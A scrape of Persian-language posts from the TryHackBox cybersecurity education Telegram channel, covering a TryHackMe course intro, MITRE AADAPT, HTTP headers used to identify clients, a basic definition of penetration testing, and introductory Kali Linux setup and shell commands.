🔖 TryHackMe Course - Pre Security | قسمت 00
💢 قسمت ۰۰ – معرفی دوره TryHackMe
🔴 درود به همه علاقهمندان امنیت سایبری!
در این مسیر آموزشی، ما قدم به قدم با استفاده از محتوای رسمی سایت TryHackMe پیش میرویم؛ یک پلتفرم آموزشی معتبر و بسیار کاربردی در حوزه هک اخلاقی و امنیت سایبری.
تمام مفاهیم و چالشهایی که در این دوره میبینید دقیقاً مطابق با آنچه در سایت TryHackMe ارائه شده است، طراحی شدهاند.
هدف ما این است که با تمرین و آموزش عملی روی محیطهای واقعی و چالشهای کاربردی، مهارتهای شما را در زمینه امنیت سایبری به شکل چشمگیری ارتقا دهیم.
پس اگر آمادهاید، همراه ما باشید تا این مسیر جذاب را با هم طی کنیم و قدم در دنیای حرفهای امنیت سایبری بگذاریم!
📌 برای دیدن ویدئو روی لینک زیر کلیک کنید :
🧩 https://youtu.be/jvSC8GJ3MWQ?si=0EE3mKY4CQtXlSEF
➖➖➖➖➖➖➖➖
🆔 @TryHackBox
💢 قسمت ۰۰ – معرفی دوره TryHackMe
🔴 درود به همه علاقهمندان امنیت سایبری!
در این مسیر آموزشی، ما قدم به قدم با استفاده از محتوای رسمی سایت TryHackMe پیش میرویم؛ یک پلتفرم آموزشی معتبر و بسیار کاربردی در حوزه هک اخلاقی و امنیت سایبری.
تمام مفاهیم و چالشهایی که در این دوره میبینید دقیقاً مطابق با آنچه در سایت TryHackMe ارائه شده است، طراحی شدهاند.
هدف ما این است که با تمرین و آموزش عملی روی محیطهای واقعی و چالشهای کاربردی، مهارتهای شما را در زمینه امنیت سایبری به شکل چشمگیری ارتقا دهیم.
پس اگر آمادهاید، همراه ما باشید تا این مسیر جذاب را با هم طی کنیم و قدم در دنیای حرفهای امنیت سایبری بگذاریم!
📌 برای دیدن ویدئو روی لینک زیر کلیک کنید :
🧩 https://youtu.be/jvSC8GJ3MWQ?si=0EE3mKY4CQtXlSEF
➖➖➖➖➖➖➖➖
🆔 @TryHackBox
❤14
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
❤5
Forwarded from P.F.K Security
https://aadapt.mitre.org/
MITRE AADAPT™
(اقدامات مخرب در فناوری های پرداخت دارایی دیجیتال) یک پایگاه دانش جامع است که تاکتیک ها و تکنیک های مهاجمان علیه سامانه های مدیریت دارایی دیجیتال را بر اساس حملات واقعی، مشاهدات و آسیب پذیری ها مستند میکند.
ساختار AADAPT مشابه فریم ورک معروف MITRE ATT&CK طراحی شده و تاکتیک ها و تکنیک هایش مکمل ATT&CK هستند.
در ماتریس AADAPT، هر ستون نمایانگر یک تاکتیک حمله است و تکنیک های مرتبط با دارایی دیجیتال زیر هر تاکتیک قرار دارند. مواردی که با نماد & مشخص شده اند، تکنیک ها یا زیرتکنیک های ATT&CK هستند که در زمینه دارایی دیجیتال نیز کاربرد دارند و جزئیات این ارتباط در ضمیمه های AADAPT توضیح داده شده است. با کلیک روی هر مورد، میتوانید توضیحات بیشتری بخوانید یا از طریق نوار بالا، تاکتیک ها و تکنیک های AADAPT را مرور کنید.
@PfkSecurity
MITRE AADAPT™
(اقدامات مخرب در فناوری های پرداخت دارایی دیجیتال) یک پایگاه دانش جامع است که تاکتیک ها و تکنیک های مهاجمان علیه سامانه های مدیریت دارایی دیجیتال را بر اساس حملات واقعی، مشاهدات و آسیب پذیری ها مستند میکند.
ساختار AADAPT مشابه فریم ورک معروف MITRE ATT&CK طراحی شده و تاکتیک ها و تکنیک هایش مکمل ATT&CK هستند.
در ماتریس AADAPT، هر ستون نمایانگر یک تاکتیک حمله است و تکنیک های مرتبط با دارایی دیجیتال زیر هر تاکتیک قرار دارند. مواردی که با نماد & مشخص شده اند، تکنیک ها یا زیرتکنیک های ATT&CK هستند که در زمینه دارایی دیجیتال نیز کاربرد دارند و جزئیات این ارتباط در ضمیمه های AADAPT توضیح داده شده است. با کلیک روی هر مورد، میتوانید توضیحات بیشتری بخوانید یا از طریق نوار بالا، تاکتیک ها و تکنیک های AADAPT را مرور کنید.
@PfkSecurity
❤6
🚀 پارت 0 (A)
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
در دنیای وب، سرورها ممکن است همزمان با هزاران کلاینت مختلف در تعامل باشند. اما چطور یک سرور میتواند تشخیص دهد که درخواست دریافتی از سوی چه کسی بوده یا به کدام کاربر تعلق دارد؟ به طور پیشفرض، پروتکل HTTP stateless (بیحالت) است، یعنی هر درخواست، مستقل از درخواستهای قبلی در نظر گرفته میشود.
برای حل این چالش، سرورها نیاز دارند بتوانند هویت کاربران را تشخیص داده و پیگیری کنند. این شناسایی امکانپذیر نیست مگر با استفاده از یکسری تکنیکها و فناوریهایی که به کمک آنها، هر کاربر یا کلاینت به صورت یکتا قابل ردیابی خواهد بود.
در این سری، به بررسی روشهایی میپردازیم که سرورها از آنها برای شناسایی کاربران بهره میبرند. این روشها هم در معماری شبکه اهمیت دارند و هم در امنیت وب، زیرا بسیاری از حملات و مکانیزمهای دفاعی (مثل تشخیص نشستهای غیرمجاز، پیگیری رفتار مشکوک و جلوگیری از جعل هویت) به همین مکانیزمهای شناسایی وابستهاند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
شناسایی کلاینتها و کوکیها (Client Identification and Cookies)
در دنیای وب، سرورها ممکن است همزمان با هزاران کلاینت مختلف در تعامل باشند. اما چطور یک سرور میتواند تشخیص دهد که درخواست دریافتی از سوی چه کسی بوده یا به کدام کاربر تعلق دارد؟ به طور پیشفرض، پروتکل HTTP stateless (بیحالت) است، یعنی هر درخواست، مستقل از درخواستهای قبلی در نظر گرفته میشود.
برای حل این چالش، سرورها نیاز دارند بتوانند هویت کاربران را تشخیص داده و پیگیری کنند. این شناسایی امکانپذیر نیست مگر با استفاده از یکسری تکنیکها و فناوریهایی که به کمک آنها، هر کاربر یا کلاینت به صورت یکتا قابل ردیابی خواهد بود.
در این سری، به بررسی روشهایی میپردازیم که سرورها از آنها برای شناسایی کاربران بهره میبرند. این روشها هم در معماری شبکه اهمیت دارند و هم در امنیت وب، زیرا بسیاری از حملات و مکانیزمهای دفاعی (مثل تشخیص نشستهای غیرمجاز، پیگیری رفتار مشکوک و جلوگیری از جعل هویت) به همین مکانیزمهای شناسایی وابستهاند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍6🔥1
🚀 پارت 0 (B)
بررسی The Personal Touch در وب مدرن
پروتکل HTTP ذاتاً یک پروتکل stateless یا بدونحالت است؛ یعنی سرور هیچگونه اطلاعاتی از درخواستهای قبلی کلاینت نگه نمیدارد. هر بار که مرورگر شما درخواستی به سرور ارسال میکند، سرور آن را بهصورت مستقل پردازش کرده و پاسخ میدهد، بدون اینکه "بداند" چه کسی درخواست را فرستاده است.
اما این رفتار، برای سرویسهای امروزی وب قابلقبول نیست. اکثر وبسایتهای مدرن میخواهند تجربهای شخصیسازیشده به کاربران ارائه دهند؛ چیزی که به آن The Personal Touch میگوییم. این یعنی سایت باید بداند شما کی هستید، سابقه تعامل شما چیست، و بتواند شما را در جریان بازدیدهای بعدی شناسایی کند.
برخی کاربردهای مهم Personal Touch:
✨ خوشآمدگویی شخصی: نمایش نام کاربر یا محتوای مخصوص او
🎯 پیشنهادهای هدفمند: ارائه محصول یا محتوا بر اساس رفتار قبلی شما
🧾 اطلاعات ذخیرهشده: عدم نیاز به وارد کردن مکرر اطلاعات (مانند آدرس یا کارت بانکی)
🛒 ردیابی سشن: نگهداشتن وضعیت سبد خرید یا فرمهای چندمرحلهای
📎 اما چطور این کار را در HTTP بدونحالت انجام میدهند؟
برای رسیدن به این هدف، تکنیکها و فناوریهای مختلفی ابداع شدهاند که به سرورها اجازه میدهند هویت کاربران را شناسایی و پیگیری کنند. برخی از این تکنیکها:
🔹Headerهای HTTP:
شامل اطلاعاتی مانند User-Agent، زبان، نوع مرورگر و…
🔹IP Address:
استفاده از آدرس IP برای شناسایی تقریبی کاربران
🔹Authentication:
شناسایی کاربران با ورود (Login) و احراز هویت
🔹Fat URLs:
قرار دادن اطلاعات شناسایی در آدرسها (نه چندان ایمن!)
🔹Cookies:
یکی از مهمترین روشها برای نگهداری وضعیت (State) کاربر
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی The Personal Touch در وب مدرن
پروتکل HTTP ذاتاً یک پروتکل stateless یا بدونحالت است؛ یعنی سرور هیچگونه اطلاعاتی از درخواستهای قبلی کلاینت نگه نمیدارد. هر بار که مرورگر شما درخواستی به سرور ارسال میکند، سرور آن را بهصورت مستقل پردازش کرده و پاسخ میدهد، بدون اینکه "بداند" چه کسی درخواست را فرستاده است.
اما این رفتار، برای سرویسهای امروزی وب قابلقبول نیست. اکثر وبسایتهای مدرن میخواهند تجربهای شخصیسازیشده به کاربران ارائه دهند؛ چیزی که به آن The Personal Touch میگوییم. این یعنی سایت باید بداند شما کی هستید، سابقه تعامل شما چیست، و بتواند شما را در جریان بازدیدهای بعدی شناسایی کند.
برخی کاربردهای مهم Personal Touch:
✨ خوشآمدگویی شخصی: نمایش نام کاربر یا محتوای مخصوص او
🎯 پیشنهادهای هدفمند: ارائه محصول یا محتوا بر اساس رفتار قبلی شما
🧾 اطلاعات ذخیرهشده: عدم نیاز به وارد کردن مکرر اطلاعات (مانند آدرس یا کارت بانکی)
🛒 ردیابی سشن: نگهداشتن وضعیت سبد خرید یا فرمهای چندمرحلهای
📎 اما چطور این کار را در HTTP بدونحالت انجام میدهند؟
برای رسیدن به این هدف، تکنیکها و فناوریهای مختلفی ابداع شدهاند که به سرورها اجازه میدهند هویت کاربران را شناسایی و پیگیری کنند. برخی از این تکنیکها:
🔹Headerهای HTTP:
شامل اطلاعاتی مانند User-Agent، زبان، نوع مرورگر و…
🔹IP Address:
استفاده از آدرس IP برای شناسایی تقریبی کاربران
🔹Authentication:
شناسایی کاربران با ورود (Login) و احراز هویت
🔹Fat URLs:
قرار دادن اطلاعات شناسایی در آدرسها (نه چندان ایمن!)
🔹Cookies:
یکی از مهمترین روشها برای نگهداری وضعیت (State) کاربر
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
👍4❤1
🔐 آنچه مردم از امنیت سایبری تصور میکنند:
👨💻 شکار کردن هدف و نوشیدن قهوه ☕️
📊 آنچه واقعاً هست:
جلسات، ریست رمزها، باز کردن اکانتها، مستندسازی، پچ کردن، مدیریت تامینکنندهها، پاسخ به رخدادها و...
🎯 امنیت سایبری فقط شکار کردن هدف نیست، بلکه دنیایی از وظایف روتین، تیممحور و پیشگیرانه است.
✍️نویسنده
@TryHackBox | The Chaos
👨💻 شکار کردن هدف و نوشیدن قهوه ☕️
📊 آنچه واقعاً هست:
جلسات، ریست رمزها، باز کردن اکانتها، مستندسازی، پچ کردن، مدیریت تامینکنندهها، پاسخ به رخدادها و...
🎯 امنیت سایبری فقط شکار کردن هدف نیست، بلکه دنیایی از وظایف روتین، تیممحور و پیشگیرانه است.
✍️نویسنده
@TryHackBox | The Chaos
🔥3
مقدمه: تست نفوذ چیست؟
تست نفوذ یک چرخه مداوم از تحقیق و حمله علیه یک هدف یا مرز است. این حمله باید به صورت ساختاریافته، محاسبهشده و در صورت امکان، در یک محیط آزمایشگاهی تأیید شود، قبل از اینکه بر روی یک هدف واقعی اجرا گردد. ما فرآیند یک تست نفوذ را به این صورت نشان میدهیم:
همانطور که مدل نشان میدهد، هرچه اطلاعات بیشتری جمعآوری کنید، احتمال موفقیت نفوذ بالاتر میرود. پس از اینکه از مرز اولیه هدف عبور کردید، معمولاً چرخه را دوباره از سر میگیرید. به عنوان مثال، ممکن است اطلاعاتی درباره شبکه داخلی جمعآوری کنید تا به صورت عمیقتر در آن نفوذ کنید.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
تست نفوذ یک چرخه مداوم از تحقیق و حمله علیه یک هدف یا مرز است. این حمله باید به صورت ساختاریافته، محاسبهشده و در صورت امکان، در یک محیط آزمایشگاهی تأیید شود، قبل از اینکه بر روی یک هدف واقعی اجرا گردد. ما فرآیند یک تست نفوذ را به این صورت نشان میدهیم:
همانطور که مدل نشان میدهد، هرچه اطلاعات بیشتری جمعآوری کنید، احتمال موفقیت نفوذ بالاتر میرود. پس از اینکه از مرز اولیه هدف عبور کردید، معمولاً چرخه را دوباره از سر میگیرید. به عنوان مثال، ممکن است اطلاعاتی درباره شبکه داخلی جمعآوری کنید تا به صورت عمیقتر در آن نفوذ کنید.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍7❤3
مقدمه: آشنایی با کالی لینوکس: قسمت اول
در ابتدا که لینوکس را نصب کرده اید، هم نام کاربری و هم رمز عبور اولیه شما kali است:
Username:
Password:
ماشین مجازی کالی لینوکس شامل دو کاربر پیشفرض به نامهای "root" و "kali" خواهد بود. ما از حساب کاربری "kali" استفاده خواهیم کرد. هرچند ممکن است وسوسهانگیز باشد که با کاربر "root" وارد شوید، اما این کار توصیه نمیشود. کاربر "root" دسترسی نامحدود دارد و یک فرمان اشتباه میتواند به سیستم ما آسیب برساند. بدتر از آن، اگر یک مهاجم بتواند از یک فرآیند در حال اجرا با دسترسی "root" سوءاستفاده کند، کنترل کامل ماشین ما را به دست خواهد گرفت.
بسیاری از دستورات برای اجرا به دسترسیهای سطح بالا نیاز دارند؛ خوشبختانه، دستور
پیشنهاد میشود که همان اول رمز عبور خود را در ترمینال با کامند
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
در ابتدا که لینوکس را نصب کرده اید، هم نام کاربری و هم رمز عبور اولیه شما kali است:
Username:
kaliPassword:
kaliماشین مجازی کالی لینوکس شامل دو کاربر پیشفرض به نامهای "root" و "kali" خواهد بود. ما از حساب کاربری "kali" استفاده خواهیم کرد. هرچند ممکن است وسوسهانگیز باشد که با کاربر "root" وارد شوید، اما این کار توصیه نمیشود. کاربر "root" دسترسی نامحدود دارد و یک فرمان اشتباه میتواند به سیستم ما آسیب برساند. بدتر از آن، اگر یک مهاجم بتواند از یک فرآیند در حال اجرا با دسترسی "root" سوءاستفاده کند، کنترل کامل ماشین ما را به دست خواهد گرفت.
بسیاری از دستورات برای اجرا به دسترسیهای سطح بالا نیاز دارند؛ خوشبختانه، دستور
sudo میتواند این مشکل را حل کند. ما عبارت sudo را قبل از دستوری که میخواهیم اجرا کنیم وارد کرده و در صورت درخواست، رمز عبور خود را وارد میکنیم.پیشنهاد میشود که همان اول رمز عبور خود را در ترمینال با کامند
passwd تغییر دهید:✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍7🔥1
🚀 پارت 1 (A)
بررسی HTTP Headers و شناسایی کاربران
در HTTP، هدرهای درخواست (Request Headers) اطلاعاتی درباره کاربر، مرورگر، مسیر ورود و تنظیمات کلاینت ارائه میدهند. برخی از این هدرها به سرور کمک میکنند تا کاربر را شناسایی یا ردیابی کند؛ حتی زمانی که ورود (Login) انجام نشده باشد.
در این پست، به بررسی ۷ هدر پرکاربرد در شناسایی کلاینتها میپردازیم:
1️⃣ From
این هدر شامل آدرس ایمیل کاربر است و در گذشته به عنوان راهی برای شناسایی کاربران در نظر گرفته میشد.
🔴 اما امروز، مرورگرها معمولاً این هدر را ارسال نمیکنند چون میتواند منجر به سوءاستفادههایی مانند اسپم یا فیشینگ شود.
🛑 در عمل، From یک هدر تقریباً منسوخ و ناامن محسوب میشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی HTTP Headers و شناسایی کاربران
در HTTP، هدرهای درخواست (Request Headers) اطلاعاتی درباره کاربر، مرورگر، مسیر ورود و تنظیمات کلاینت ارائه میدهند. برخی از این هدرها به سرور کمک میکنند تا کاربر را شناسایی یا ردیابی کند؛ حتی زمانی که ورود (Login) انجام نشده باشد.
در این پست، به بررسی ۷ هدر پرکاربرد در شناسایی کلاینتها میپردازیم:
1️⃣ From
این هدر شامل آدرس ایمیل کاربر است و در گذشته به عنوان راهی برای شناسایی کاربران در نظر گرفته میشد.
🔴 اما امروز، مرورگرها معمولاً این هدر را ارسال نمیکنند چون میتواند منجر به سوءاستفادههایی مانند اسپم یا فیشینگ شود.
🛑 در عمل، From یک هدر تقریباً منسوخ و ناامن محسوب میشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
🔥4
🚀 پارت 1 (B)
بررسی HTTP Headers و شناسایی کاربران
2️⃣ User-Agent
شامل اطلاعات دقیق درباره مرورگر، نسخه آن، سیستمعامل و گاهی معماری سیستم است.
مثال:
🔍 کاربرد امنیتی: ترکیب این اطلاعات میتواند در ساخت یک پروفایل نسبی از کلاینت استفاده شود. اگر ترکیب User-Agent خاصی فقط توسط یک کاربر استفاده شود، سرور میتواند آن را شناسایی کند.
3️⃣ Referer
مشخص میکند که کاربر از کدام صفحه یا سایت به این صفحه فعلی رسیده است.
✅ کاربردها:
* تحلیل رفتار کاربران
* ردگیری مسیر بازدید (Path Tracking)
* شناسایی منابع ترافیک (مثلاً از Google آمده یا از یک سایت تبلیغاتی)
⚠️ از منظر امنیتی، این هدر میتواند اطلاعات حساس (مانند توکنها در URL) را نیز فاش کند، به همین دلیل در بسیاری از برنامههای امن، مقدار آن کنترل یا حذف میشود.
4️⃣ Accept-Language
مشخص میکند زبانهای ترجیحی کاربر چیست. برای مثال:
🌐 کاربردها:
* نمایش خودکار سایت به زبان مناسب
* شناسایی منطقه جغرافیایی کاربر
🎯 در کنار IP و User-Agent میتواند بخشی از پروفایل شناسایی کاربر را شکل دهد.
5️⃣ Accept
این هدر مشخص میکند که کلاینت چه نوع محتواهایی را پشتیبانی میکند (مثلاً HTML، JSON یا XML).
نمونه:
🧩 اگرچه نقش مستقیمی در شناسایی ندارد، ولی ترکیب خاص مقادیر این هدر میتواند بهصورت غیرمستقیم در Fingerprinting کاربر مفید باشد.
6️⃣ Accept-Encoding
بیان میکند که چه الگوریتمهای فشردهسازی (مثل gzip یا br) توسط کلاینت پشتیبانی میشوند.
🛡 اگرچه هدف اصلی آن کاهش حجم پاسخ است، اما باز هم میتواند بخشی از اثر انگشت مرورگر (Browser Fingerprint) را بسازد.
7️⃣ DNT (Do Not Track)
این هدر اعلام میکند که آیا کاربر میخواهد ردیابی نشود (Do Not Track).
مقدار آن معمولاً
🚫 این هدر غیرالزامی و داوطلبانه است، و بسیاری از سرورها آن را نادیده میگیرند.
📌 جمعبندی:
درست است که هیچکدام از این هدرها بهتنهایی برای شناسایی دقیق کافی نیستند، اما ترکیب آنها میتواند به ساخت اثر انگشت دیجیتال (Fingerprint) کمک کند. این روشها پایه بسیاری از سامانههای تشخیص تقلب، تبلیغات هدفمند، یا حتی حملات مبتنی بر شناسایی مرورگر هستند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
بررسی HTTP Headers و شناسایی کاربران
2️⃣ User-Agent
شامل اطلاعات دقیق درباره مرورگر، نسخه آن، سیستمعامل و گاهی معماری سیستم است.
مثال:
Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
🔍 کاربرد امنیتی: ترکیب این اطلاعات میتواند در ساخت یک پروفایل نسبی از کلاینت استفاده شود. اگر ترکیب User-Agent خاصی فقط توسط یک کاربر استفاده شود، سرور میتواند آن را شناسایی کند.
3️⃣ Referer
مشخص میکند که کاربر از کدام صفحه یا سایت به این صفحه فعلی رسیده است.
✅ کاربردها:
* تحلیل رفتار کاربران
* ردگیری مسیر بازدید (Path Tracking)
* شناسایی منابع ترافیک (مثلاً از Google آمده یا از یک سایت تبلیغاتی)
⚠️ از منظر امنیتی، این هدر میتواند اطلاعات حساس (مانند توکنها در URL) را نیز فاش کند، به همین دلیل در بسیاری از برنامههای امن، مقدار آن کنترل یا حذف میشود.
4️⃣ Accept-Language
مشخص میکند زبانهای ترجیحی کاربر چیست. برای مثال:
Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en;q=0.7
🌐 کاربردها:
* نمایش خودکار سایت به زبان مناسب
* شناسایی منطقه جغرافیایی کاربر
🎯 در کنار IP و User-Agent میتواند بخشی از پروفایل شناسایی کاربر را شکل دهد.
5️⃣ Accept
این هدر مشخص میکند که کلاینت چه نوع محتواهایی را پشتیبانی میکند (مثلاً HTML، JSON یا XML).
نمونه:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
🧩 اگرچه نقش مستقیمی در شناسایی ندارد، ولی ترکیب خاص مقادیر این هدر میتواند بهصورت غیرمستقیم در Fingerprinting کاربر مفید باشد.
6️⃣ Accept-Encoding
بیان میکند که چه الگوریتمهای فشردهسازی (مثل gzip یا br) توسط کلاینت پشتیبانی میشوند.
🛡 اگرچه هدف اصلی آن کاهش حجم پاسخ است، اما باز هم میتواند بخشی از اثر انگشت مرورگر (Browser Fingerprint) را بسازد.
7️⃣ DNT (Do Not Track)
این هدر اعلام میکند که آیا کاربر میخواهد ردیابی نشود (Do Not Track).
مقدار آن معمولاً
1 برای فعالبودن یا 0 برای غیرفعالبودن است.🚫 این هدر غیرالزامی و داوطلبانه است، و بسیاری از سرورها آن را نادیده میگیرند.
📌 جمعبندی:
درست است که هیچکدام از این هدرها بهتنهایی برای شناسایی دقیق کافی نیستند، اما ترکیب آنها میتواند به ساخت اثر انگشت دیجیتال (Fingerprint) کمک کند. این روشها پایه بسیاری از سامانههای تشخیص تقلب، تبلیغات هدفمند، یا حتی حملات مبتنی بر شناسایی مرورگر هستند.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Cookies #CyberSecurity
❤10🔥2🙏2
مقدمه: آشنایی با کالی لینوکس: قسمت دوم
کالی لینوکس از استاندارد سلسلهمراتب سیستم فایل (FHS) پیروی میکند که یک ساختار آشنا و جهانی برای تمام کاربران لینوکس فراهم میآورد. دایرکتوریهایی که بیشتر به کار شما خواهند آمد عبارتند از:
دایرکتوریهای دیگری نیز وجود دارند که به ندرت نیاز به ورود به آنها خواهید داشت، اما آشنایی خوب با ساختار سیستم فایل لینوکس، به شدت به کارایی شما کمک خواهد کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
کالی لینوکس از استاندارد سلسلهمراتب سیستم فایل (FHS) پیروی میکند که یک ساختار آشنا و جهانی برای تمام کاربران لینوکس فراهم میآورد. دایرکتوریهایی که بیشتر به کار شما خواهند آمد عبارتند از:
/bin - برنامههای پایه (مانند ls, cd, cat و غیره)/sbin - برنامههای سیستمی (مانند fdisk, mkfs, sysctl و غیره) /etc - فایلهای پیکربندی/tmp - فایلهای موقت (که معمولاً هنگام راهاندازی مجدد، حذف میشوند) /usr/bin - برنامهها (مانند apt, ncat, nmap و غیره)/usr/share - فایلهای پشتیبانی برنامه و دادههادایرکتوریهای دیگری نیز وجود دارند که به ندرت نیاز به ورود به آنها خواهید داشت، اما آشنایی خوب با ساختار سیستم فایل لینوکس، به شدت به کارایی شما کمک خواهد کرد.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
👍6❤3
XXE Cheat Sheet (2025 Update).pdf
626.8 KB
✏️ مقاله تالیف شده
XXE Cheat Sheet (2025 Update)
✍️نویسنده
@TryHackBox | The Chaos
#XEE #CheatSheet #CyberSecurity
XXE Cheat Sheet (2025 Update)
✍️نویسنده
@TryHackBox | The Chaos
#XEE #CheatSheet #CyberSecurity
👍4🔥4
مقدمه:آشنایی با کالی لینوکس: قسمت سوم: basic linux commands
1. man pages
دستور
استفاده:
بهعنوان مثال:
این دستور مستندات مربوط به دستور
2. apropos
دستور
استفاده:
بهعنوان مثال:
این دستور تمام دستورات و ابزارهایی که مرتبط با شبکه هستند را نمایش میدهد.
3. listing files & options
دستور
آپشنها:
*
*
*
*
استفاده:
این دستور لیست تمام فایلها و دایرکتوریها را بههمراه جزئیات نشان میدهد، حتی فایلهای مخفی.
4. cd
دستور
استفاده:
بهعنوان مثال:
این دستور شما را به دایرکتوری
نکات:
* اگر دستور
* استفاده از
5. pwd
شرح: دستور
استفاده:
این دستور مسیر دایرکتوری فعلی را نمایش میدهد، بهعنوان مثال:
بهعنوان مثال:
این دستور یک دایرکتوری به نام
آپشنها:
*
این دستور دایرکتوری
جمعبندی:
این دستورات جزو دستورات پایهای و مهم در لینوکس هستند که برای مدیریت دایرکتوریها، فایلها، و جستجو در مستندات سیستم استفاده میشوند. برای کار با Kali Linux و انجام تستهای نفوذ، این دستورات بسیار مهم هستند و اغلب در فرآیندهای مختلف استفاده میشوند.
✍️نویسنده
@TryHackBox| احسان آخوندی
#pwk #CyberSecurity
1. man pages
دستور
man (مخفف Manual) به شما این امکان را میدهد که مستندات و راهنماهای مربوط به دستورات لینوکس را مشاهده کنید. هر دستور در لینوکس، مستندات یا "صفحات راهنما" دارد که توضیحاتی در مورد نحوه استفاده از آن دستور، آپشنها، و پارامترهای مختلف را ارائه میدهند.استفاده:
man <command>
بهعنوان مثال:
man ls
این دستور مستندات مربوط به دستور
ls (که برای لیست کردن محتویات دایرکتوری استفاده میشود) را نمایش میدهد.2. apropos
دستور
apropos به شما این امکان را میدهد که بهدنبال یک عبارت یا کلمه کلیدی در صفحات راهنمای لینوکس بگردید. این دستور بهویژه زمانی مفید است که شما بخواهید از دستورات موجود در سیستم برای انجام یک کار خاص آگاه شوید، اما دقیقا نمیدانید که چه دستوری برای انجام آن کار وجود دارد.استفاده:
apropos <keyword>
بهعنوان مثال:
apropos network
این دستور تمام دستورات و ابزارهایی که مرتبط با شبکه هستند را نمایش میدهد.
3. listing files & options
دستور
ls برای لیست کردن فایلها و دایرکتوریها در یک دایرکتوری استفاده میشود. این دستور میتواند با آپشنهای مختلف برای نمایش اطلاعات بیشتر مانند جزئیات فایلها، ترتیب خاص و فیلترهای مختلف تنظیم شود.آپشنها:
*
-l: نمایش اطلاعات بهصورت لیست (جزئیات فایلها مانند مجوزها، سایز، تاریخ و غیره).*
-a: نمایش فایلهای مخفی (فایلهایی که نام آنها با نقطه شروع میشود).*
-h: نمایش اندازه فایلها بهصورت خوانا (مثلاً 1K, 234M).*
-R: نمایش محتویات دایرکتوریها بهصورت بازگشتی.استفاده:
ls -la
این دستور لیست تمام فایلها و دایرکتوریها را بههمراه جزئیات نشان میدهد، حتی فایلهای مخفی.
4. cd
دستور
cd (مخفف "change directory") برای تغییر دایرکتوری فعلی در سیستم فایل استفاده میشود. با استفاده از این دستور میتوانید به دایرکتوریهای مختلف جابهجا شوید.استفاده:
cd <directory_path>
بهعنوان مثال:
cd /home/user/Documents
این دستور شما را به دایرکتوری
Documents در مسیر /home/user/ منتقل میکند.نکات:
* اگر دستور
cd بدون آرگومان اجرا شود، به دایرکتوری خانگی (home) شما منتقل میشود.* استفاده از
cd .. شما را به دایرکتوری بالاتر (والد) میبرد.5. pwd
شرح: دستور
pwd (مخفف "print working directory") برای نمایش مسیر دایرکتوری فعلی که در آن قرار دارید، استفاده میشود. این دستور مسیر کامل دایرکتوری جاری را نمایش میدهد.استفاده:
pwd
این دستور مسیر دایرکتوری فعلی را نمایش میدهد، بهعنوان مثال:
/home/user/Documents
6. mkdir
دستور mkdir برای ایجاد دایرکتوریهای جدید در سیستم استفاده میشود.
mkdir <directory_name>
بهعنوان مثال:
mkdir new_folder
این دستور یک دایرکتوری به نام
new_folder در دایرکتوری فعلی ایجاد میکند.آپشنها:
*
-p: این آپشن به شما اجازه میدهد که چندین دایرکتوری را به صورت همزمان و به صورت سلسلهمراتبی بسازید. اگر دایرکتوری پدر وجود نداشته باشد، آنرا نیز ایجاد میکند.mkdir -p /home/user/new_folder/sub_folder
این دستور دایرکتوری
new_folder و سپس sub_folder را در داخل آن ایجاد میکند.جمعبندی:
این دستورات جزو دستورات پایهای و مهم در لینوکس هستند که برای مدیریت دایرکتوریها، فایلها، و جستجو در مستندات سیستم استفاده میشوند. برای کار با Kali Linux و انجام تستهای نفوذ، این دستورات بسیار مهم هستند و اغلب در فرآیندهای مختلف استفاده میشوند.
✍️نویسنده
